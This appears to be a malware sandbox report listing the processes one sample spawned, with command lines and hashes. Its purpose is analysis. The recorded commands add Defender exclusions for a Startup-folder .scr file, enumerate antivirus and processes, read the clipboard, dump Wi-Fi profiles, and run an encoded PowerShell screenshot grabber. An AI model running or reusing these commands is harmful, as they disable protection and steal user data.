Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	20:22:02
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1848, Parent PID: 5556

General

Target ID:	15
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7228, Parent PID: 7176

General

Target ID:	21
Start time:	20:22:03
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	20:22:04
Start date:	03/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff669c80000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	20:22:04
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	20:22:04
Start date:	03/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6e8540000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	20:22:04
Start date:	03/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff669c80000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	20:22:04
Start date:	03/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff669c80000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	20:22:05
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	20:22:05
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	20:22:05
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	20:22:05
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	20:22:05
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	20:22:06
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	20:22:06
Start date:	03/08/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7269b0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7756, Parent PID: 5260

General

Target ID:	36
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6a7b40000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7a3e00000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff6af5c0000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	20:22:07
Start date:	03/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	20:22:09
Start date:	03/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
Imagebase:	0x7ff704e80000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	20:22:09
Start date:	03/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
Imagebase:	0x7ff7370c0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

